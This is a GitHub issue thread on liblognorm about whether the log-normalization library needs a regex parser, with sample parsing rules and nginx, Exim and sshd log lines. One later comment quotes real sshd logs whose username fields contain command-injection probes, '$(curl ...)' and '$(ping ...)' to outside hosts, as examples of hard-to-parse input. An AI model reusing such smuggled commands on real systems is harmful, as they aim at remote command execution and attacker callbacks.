rsyslog / liblognorm

a fast samples-based log normalization library
http://www.liblognorm.com
GNU Lesser General Public License v2.1
99 stars 64 forks source link

Do we need a "regex" parser? #143

Open rgerhards opened 9 years ago

rgerhards commented 9 years ago

some late versions of liblognorm v1 had a regex parser, but it was disabled by default and users were strongly advised not to activate it due to bad performance. Also, there is the general fear that the availability of "regex" makes users use it, simply because this is something they know well. Given the fact that the whole point of liblognorm is to gain speed by avoiding regex processing, this sounds like a very bad thing. Note that we avoid regexp because all the major implementation do have very bad runtime, often exponential (PCRE is a "good" example here).

In v1, I accepted the regex parser because there were some border cases which were hard to process otherwise. With the much-increased capabilities of v2, I see an even lower need for regex processing. So it is currently not supported in v2.

If you have real trouble without regex, please post your use case here (no theoretical thoughts, please, I would like to see where it really hurts!). This can lead to changes in liblognorm or maybe to the re-introduction of a regex feature. In the latter case, we may go for some of those small libraries that actually are O(n), with n being the max message size -- a complexity that can be easily achieved for regex if regex processing is not abused.

janmejay commented 8 years ago

Logging frameworks that allow context-building (like picking variables from thread-context or manually created logging-context etc) often generate logs that have a lot of fields that can be easily parsed along with a free-form fragment which can have arbitrary content (content comes form many places in application, or is generated by an external service call etc). I have come across a handful of such cases (from different users of-course).

In such cases, the free-form portion is perfectly human readable(which is why they were coded up that way), but not easy to handle without regex while parsing it.

For instance, consider this rule:

rule=:"%client_ip:char-to:"%" %tcp_peer_ip:ipv4% - [%req_time:char-to:]%] "%verb:word% %url:word% %protocol:char-to:"%" %status:interpret:int:number% %latency:interpret:float:word% %bytes_sent:interpret:int:number% "%referrer:char-to:"%" "%user_agent:char-to:"%" %upstream_addrs:tokenized:, :tokenized: \x3a :regex:[^ ,]+% %upstream_responsetimes:tokenized:, :tokenized: \x3a :interpret:float:regex:[^ ,]+% %pipe:word% \t %host:word% cache%cache:word%

Nginx generates multiple upstream_addr and upstream_status separated by comma and colon. Regex provides a clean way to handle it.

Also, it allows a large set of unforeseen cases to be handled at user's level without being blocked on code-changes. It allows user to be unblocked immediately and if the usecase if important enough bring it to our notice(or create a PR). Once its supported first-class, replace regex call with it.

rgerhards commented 8 years ago

Can you post a sample log line that matches the rule?

I am very concerned that once we add regex support, users begin to use it simply because they know regex. That would make liblognorm just another dull low performance solution. I think we should try to do better.

rgerhards commented 8 years ago

I should stress that I am really after the actual samples rather than theoretical thoughts. I know that there are different schools of thinking and I would like to see where we are really hurt in practice without regex.

davidelang commented 8 years ago

On Wed, 25 Nov 2015, Janmejay Singh wrote:

Logging frameworks that allow context-building (like picking variables from thread-context or manually created logging-context etc) often generate logs that have a lot of fields that can be easily parsed along with a free-form fragment which can have arbitrary content (content comes form many places in application, or is generated by an external service call etc). I have come across a handful of such cases (from different users of-course).

In such cases, the free-form portion is perfectly human readable(which is why they were coded up that way), but not easy to handle without regex while parsing it.

For instance, consider this rule:

rule=:"%client_ip:char-to:"%" %tcp_peer_ip:ipv4% - [%req_time:char-to:]%] "%verb:word% %url:word% %protocol:char-to:"%" %status:interpret:int:number% %latency:interpret:float:word% %bytes_sent:interpret:int:number% "%referrer:char-to:"%" "%user_agent:char-to:"%" %upstream_addrs:tokenized:, :tokenized: \x3a :regex:[^ ,]+% %upstream_responsetimes:tokenized:, :tokenized: \x3a :interpret:float:regex:[^ ,]+% %pipe:word% \t %host:word% cache%cache:word%

Nginx generates multiple upstream_addr and upstream_status separated by comma and colon. Regex provides a clean way to handle it.

Also, it allows a large set of unforeseen cases to be handled at user's level without being blocked on code-changes. It allows user to be unblocked immediately and if the usecase if important enough bring it to our notice(or create a PR). Once its supported first-class, replace regex call with it.

take a look at the liblognorm v2 capabilities (repeated, custom types, alternates). I think they provide a way to much more readily address this.

we still need a more generic name-value capability in v2 (where we can define the name limits, and the two separator types)

David Lang

rgerhards commented 8 years ago

the current discussion around different date formats might show a valid argument pro regex support. Can't provide more details at this moment, but thought I at least add the information to this tracker.

davidelang commented 8 years ago

full regex support wouldn't solve the date parsing problem. I would make it easier to extract the various components, but not assemble the components into a timestamp result.

However, the grok compatibility module is a regex engine, so it may address the request.

There are some regex engines that are far more efficient than the standard ones when dealing with large bodies of rules (IIRC Google released one that turned the pile of regex lines into a parse tree)

cbay commented 7 years ago

Exim log lines look like this:

2002-10-31 08:57:53 16ZCW1-0005MB-00 <= kryten@dwarf.fict.example H=mailer.fict.example [192.168.123.123] U=exim P=smtp S=5678 id=123456789

The first few fields are fixed, but then Exim adds a variable number of additional fields, prefixed by 'X=' where X is the field name. There are 24 possible additional fields. Exim puts them in a fixed order (H will always come before U, which comes before P, etc.), but each log line may include any number of additional fields. So for instance, you can have those log lines:

2002-10-31 08:57:53 16ZCW1-0005MB-00 <= kryten@dwarf.fict.example H=mailer.fict.example [192.168.123.123] P=smtp X=TLS1.0:ECDHE_RSA_AES_256_CBC_SHA1:256 CV=no A=login:foo@example.com S=5678 id=123456789
2002-10-31 08:57:53 16ZCW1-0005MB-00 <= kryten@dwarf.fict.example H=mailer.fict.example [192.168.123.123] U=exim P=smtp S=5678 T="subject line" id=123456789

This can be easily parsed with a regex having optional items, such as (I've only included a few fields, not the 24 of them):

(?P<id>\S+) (?P<direction>\S+) (?P<email>\S+)( F=<(?P<f>\S+)>)?( R=(?P<r>\S+))?( T=(?P<t>\S+))?( S=(?P<s>\S+))?( H=(?P<h>\S+ \[\S+\]))?( X=(?P<x>\S+))?( CV=(?P<cv>\S+))?( C="(?P<c>.+)")?( QT=(?P<qt>\S+))?( DT=(?P<dt>\S+))?

Unless I've missed something, there's no way to parse such log lines with liblognorm (well, unless you have a rule for each possible combination of fields, which is pretty much impossible).

davidelang commented 7 years ago

look for the repeat parser

There is a regex parser available, but it is cripplingly slow by comparison

listing each combination is actually nice and fast with liblognorm, it doesn't impose a massive slowdown the way multiple regex rules do

cbay commented 7 years ago

Listing each combination is just not possible. There are 24 possible fields, and although my maths is rusty, there must be thousands (if not a lot more) of possibilities.

jbyers-suse commented 6 years ago

It seems as though the string parser might need "lazy" matching mode to parse strings formed using a random combination of uppercase / lowercase characters, numbers along with a special symbol in the middle of the string such as the underscore character as an example. I understand that you could use regex to parse the custom string too.

In lazy mode, the parser always matches if at least one character can be matched. This can lead to unexpected results, so use it with care.

Could someone explain why it might cause "unexpected" results? Thank you.

candlerb commented 5 years ago

As far as I can tell, liblognorm doesn't support a zero-or-one match, like (?:abc)? in regex. That's the main issue with the exim example.

It could be done with alternates if an empty alternate was allowed. This might end up with more backtracking though: in the DAG, even if you give preference to the "match" branch, you may end up at a dead end and have to return to retry via the "empty" branch. In practice I don't think this would be an issue though - e.g. exim logs have already been matched as exim by this point.

davidelang commented 5 years ago

see https://www.researchgate.net/publication/310545144_Efficient_Normalization_of_IT_Log_Messages_under_Realtime_Conditions

regex performance is really poor compared to liblognorm

I think we need to enable empty alternates, but you can work around this by including another item in the alternate (for example ': " vs " " if you want to allow the : to be optional)

David Lang

cybersecuritypoet commented 3 years ago

I see that the issue is pretty much dead, but I would like to add a comment for reference.

Logs requiring regex: An example of logs that I believe cannot be parsed by liblognorm without regex are SSHD logs with username not being a single word. This is clearly a mistake or an exploitation attempt, nevertheless I cannot parse those logs. The part in bold is the username. The parsing of username should stop at encountering"%ip:ipv4% port %port:number% [preauth]" (simplifying it here for the sake of readability), which is not how liblognorm works as far as I understand. This is where, while being far from ideal solution, a regex parser would work. Alternatively, liblognorm would have to support a parser like "match-to", matching everything till a match, defined as liblognorm parser, is found. Example: _match-to{"parser":"%ip:ipv4% port %port:number% [preauth]%.:end_ofline%"}, assuming that _end_ofline "parser" is available.

Examples:

Connection closed by invalid user **$(curl 116.203.26.222** 1.1.1.1 port 60598 [preauth]
Connection closed by invalid user **$(ping -c 1 95.217.6.177.jitgit.com)** 1.1.1.1 port 57214 [preauth]
Disconnected from invalid user **95.216.157.84 - SSH-2.0-Ope.SSH_8.2p1 Ubuntu-4ubuntu0.1\\\\r** 1.1.1.1 port 34908 [preauth]
Disconnected from invalid user **95.217.143.212 - SSH-2.0-Ope.SSH_7.4p1 Debian-10+deb9u1** 1.1.1.1 port 40250 [preauth]

Empty alternative match Empty alternatives would also help in reducing the rulebase size, as the username in sshd logs can be an empty string apparently. The result should be the variable containing an empty string though, not omitting the variable, as having an empty string still provides information.

Examples:

Failed password for invalid user some_user from 1.1.1.1 port 39202 ssh2
Failed password for invalid user  from 1.1.1.1 port 41923 ssh2
davidelang commented 3 years ago

why can't you use string-to, matching ' from ' in this case?

David Lang

On Fri, 18 Jun 2021, cybersecuritypoet wrote:

Date: Fri, 18 Jun 2021 22:34:15 -0700 From: cybersecuritypoet @.> Reply-To: rsyslog/liblognorm @.> To: rsyslog/liblognorm @.> Cc: David Lang @.>, Comment @.***> Subject: Re: [rsyslog/liblognorm] Do we need a "regex" parser? (#143)

I see that the issue is pretty much dead, but I would like to add a comment for reference.

Logs requiring regex: An example of logs that I believe cannot be parsed by liblognorm without regex are SSHD logs with username not being a single word. This is clearly a mistake or an exploitation attempt, nevertheless I cannot parse those logs. The part in bold is the username. The parsing of username should stop at encountering"%ip:ipv4% port %port:number% [preauth]" (simplifying it here for the sake of readability), which is not how liblognorm works as far as I understand. This is where, while being far from ideal solution, a regex parser would work. Alternatively, liblognorm would have to support a parser like "match-to", matching everything till a match, defined as liblognorm parser, is found. Example: _match-to{"parser":"%ip:ipv4% port %port:number% [preauth]%.:end_ofline%"}, assuming that _end_ofline "parser" is available.

Examples:

Connection closed by invalid user **$(curl 116.203.26.222** 1.1.1.1 port 60598 [preauth]
Connection closed by invalid user **$(ping -c 1 95.217.6.177.jitgit.com)** 1.1.1.1 port 57214 [preauth]
Disconnected from invalid user **95.216.157.84 - SSH-2.0-Ope.SSH_8.2p1 Ubuntu-4ubuntu0.1\\\\r** 1.1.1.1 port 34908 [preauth]
Disconnected from invalid user **95.217.143.212 - SSH-2.0-Ope.SSH_7.4p1 Debian-10+deb9u1** 1.1.1.1 port 40250 [preauth]

Empty alternative match Empty alternatives would also help in reducing the rulebase size, as the username in sshd logs can be an empty string apparently. The result should be the variable containing an empty string though, not omitting the variable, as having an empty string still provides information.

Examples:

Failed password for invalid user some_user from 1.1.1.1 port 39202 ssh2
Failed password for invalid user  from 1.1.1.1 port 41923 ssh2
cybersecuritypoet commented 3 years ago

Would string-to match an empty string? The description suggests that it wouldn't: One or more characters, up to the next string given in “extradata”.

Also, because the username can be pretty much anything - it might contain ' from ' string. The solution you are proposing might cover vast majority of username cases, but it is not 100% precise parser. There is a number of edge cases that won't be covered and at the moment nothing can be done with that as far as I understand.

davidelang commented 3 years ago

no, it will not match an empty string.

But if you know the field that appears next, you can match that

so if you have

username=something foo=something rule=:username=%username:string-to: foo=% foo=%foo:rest%

would work

This is why freeform fields like username, especilly ones where you will allow ' and space in them should be enclosed in double quotes (or some other delimiter that you don't allow in the name)

David Lang

On Thu, 15 Jul 2021, cybersecuritypoet wrote:

Date: Thu, 15 Jul 2021 15:30:38 -0700 From: cybersecuritypoet @.> Reply-To: rsyslog/liblognorm @.> To: rsyslog/liblognorm @.> Cc: David Lang @.>, Comment @.***> Subject: Re: [rsyslog/liblognorm] Do we need a "regex" parser? (#143)

Would string-to match an empty string? The description suggests that it wouldn't: One or more characters, up to the next string given in “extradata”.

Also, because the username can be pretty much anything - it might contain ' from ' string. The solution you are proposing might cover vast majority of username cases, but it is not 100% precise parser. There is a number of edge cases that won't be covered and at the moment nothing can be done with that as far as I understand.

-- You are receiving this because you commented. Reply to this email directly or view it on GitHub: https://github.com/rsyslog/liblognorm/issues/143#issuecomment-881052008

cybersecuritypoet commented 3 years ago

I think there might be some misunderstanding.

Your solution will not work if the username is empty. Your solution will not work as desired/at all if the username contains ' foo=' string. Both cases are possible, as the provided logs prove, and they represent two separate problems.

If you have no control over contents of a field, then my understanding is that there is literally no way you can match that field without regex at this stage. You can, to some degree, work around empty fields, having multiple versions of a rule, but that solves only one problem and is a fairly dirty hack which greatly increases the size of rulebase.

This is why freeform fields like username, especilly ones where you will allow ' and space in them should be enclosed in double quotes (or some other delimiter that you don't allow in the name)

Sure, that is the best practice, nevertheless, we are discussing a parsing library, which we want to use to deal with particular logs. We can't just say that the solution is to "Fix the logs". There are numerous solutions that log in that fashion. Often it is even impossible to find printable characters that cannot be used in usernames, as a lot of modern systems allow all printable characters to be used. I don't think we can just go to OpenSSH (and all others) and ask them to fix the logs, that are in a specific format, that has been used for years, breaking backward compatibility. It would be great, though.

davidelang commented 3 years ago

you could remove the space at the beginning of foo= and it shouild match an empty name (at the cost of including a space after every real name, but that can be cleaned up)

it will still break if a name includes foo=, but what names are valid that include = in them?

If you allow anything in a name and don't have a delimiter (and don't escape it), it is going to be impossible to parse reliably no matter what you do (and leads to sql injection vulnerabilities, etc)

David Lang

On Thu, 15 Jul 2021, cybersecuritypoet wrote:

Date: Thu, 15 Jul 2021 16:48:41 -0700 From: cybersecuritypoet @.> Reply-To: rsyslog/liblognorm @.> To: rsyslog/liblognorm @.> Cc: David Lang @.>, Comment @.***> Subject: Re: [rsyslog/liblognorm] Do we need a "regex" parser? (#143)

I think there might be some misunderstanding.

Your solution will not work if the username is empty. Your solution will not work as desired/at all if the username contains ' foo=' string. Both cases are possible, as the provided logs prove, and they represent two separate problems.

If you have no control over contents of a field, then my understanding is that there is literally no way you can match that field without regex at this stage. You can, to some degree, work around empty fields, having multiple versions of a rule, but that solves only one problem and is a fairly dirty hack which greatly increases the size of rulebase.

This is why freeform fields like username, especilly ones where you will allow ' and space in them should be enclosed in double quotes (or some other delimiter that you don't allow in the name)

Sure, that is the best practice, nevertheless, we are discussing a parsing library, which we want to use to deal with particular logs. We can't just say that the solution is to "Fix the logs". There are numerous solutions that log in that fashion. Often it is even impossible to find printable characters that cannot be used in usernames, as a lot of modern systems allow all printable characters to be used. I don't think we can just go to OpenSSH (and all others) and ask them to fix the logs, that are in a specific format, that has been used for years, breaking backward compatibility. It would be great, though.

davidelang commented 3 years ago

On Thu, 15 Jul 2021, cybersecuritypoet wrote:

Sure, that is the best practice, nevertheless, we are discussing a parsing library, which we want to use to deal with particular logs. We can't just say that the solution is to "Fix the logs". There are numerous solutions that log in that fashion. Often it is even impossible to find printable characters that cannot be used in usernames, as a lot of modern systems allow all printable characters to be used. I don't think we can just go to OpenSSH (and all others) and ask them to fix the logs, that are in a specific format, that has been used for years, breaking backward compatibility. It would be great, though.

actually, if you can demonstrate a vulnerability in the logs, you can (they won't like it, but you can). not having any character limits or delimiters/escaping on usernames is a security vulnerability that needs to be closed.

David Lang

cybersecuritypoet commented 3 years ago

If you allow anything in a name and don't have a delimiter (and don't escape it), it is going to be impossible to parse reliably no matter what you do (and leads to sql injection vulnerabilities, etc)

Using regex, with anchoring from beginning and end, you can at least account for one unknown text inside. Let's assume anchors cannot be "forged" (protection exist to prohibit not printable characters), then regex allows specifying way of parsing from start, and from end, and then throwing everything between them into an extracting group. This solves at least that one use case, which is a a huge chunk of cases from my experience. Having regex rules at least partially solves a real-world problem.

I can protect myself from sql injection vulnerabilities by properly designing the application (prepared statements), or not using SQL at all - Elasticsearch, Splunk, MongoDB, etc. are more likely destinations for logs. There are ways of dealing with input that is not sanitized, and this should not be a limiting factor from the perspective of a parsing library.

Fiddling with removing the space, and other modifications done AFTER the parsing library has done it's work does not change the fact that the library does not provide a way to do that. I am not saying it is impossible to work around, I am saying that the functionality would benefit this particular library.

it will still break if a name includes foo=, but what names are valid that include = in them?

This time it is 'foo=', but that is just one case. Next time it is 'from ', which is, much easier to imagine. The possibilities are endless. Look at the username strings that I have provided in logs. Those are enough of a proof that it can be easily encountered in real world - the logs are from an Internet-facing server. I disposed of other examples, but they were numerous, containing different strings.

 **95.216.157.84 - SSH-2.0-Ope.SSH_8.2p1 Ubuntu-4ubuntu0.1\\\\r**
**$(ping -c 1 95.217.6.177.jitgit.com)**

actually, if you can demonstrate a vulnerability in the logs, you can (they won't like it, but you can). not having any character limits or delimiters/escaping on usernames is a security vulnerability that needs to be closed.

That I am not sure of. The character limit might, and probably exists from practical perspective (e.g. maximum packet size), but it doesn't change the problem we are discussing. The logs are not themselves executed, so their contents doesn't have to be sanitized. As far as I understand, username is any ISO 10646 UTF-8 constrained text. There is no vulnerability per se. There is an inconveniency for those trying to parse the logs, but that wouldn't be a likely candidate for a quick fix.

https://datatracker.ietf.org/doc/html/rfc4252#section-11:

      byte      SSH_MSG_USERAUTH_REQUEST
      string    user name in ISO-10646 UTF-8 encoding [RFC3629]
      string    service name in US-ASCII
      string    method name in US-ASCII
      ....      method specific fields

https://datatracker.ietf.org/doc/html/rfc4251#section-4.5:

   For the most part, the SSH protocols do not directly pass text that
   would be displayed to the user.  However, there are some places where
   such data might be passed.  When applicable, the character set for
   the data MUST be explicitly specified.  In most places, ISO-10646
   UTF-8 encoding is used [RFC3629].  When applicable, a field is also
   provided for a language tag [RFC3066].
(...)
  The client and server user names are inherently constrained by what
   the server is prepared to accept.  They might, however, occasionally
   be displayed in logs, reports, etc.  They MUST be encoded using ISO
   10646 UTF-8, but other encodings may be required in some cases.  It
   is up to the server to decide how to map user names to accepted user
   names.  Straight bit-wise, binary comparison is RECOMMENDED.

I don't think continuing the discussion on SSH is beneficial to this issue. This is just one example of a broader issue.

I should stress that I am really after the actual samples rather than theoretical thoughts. I know that there are different schools of thinking and I would like to see where we are really hurt in practice without regex.

A couple years ago @rgerhards asked for examples of things that hurt us in real world - I have provided examples from my experience that hurt my use cases. Those might not be convincing enough to change the way this library works, fair enough, but I am convinced that there is merit behind those particular examples.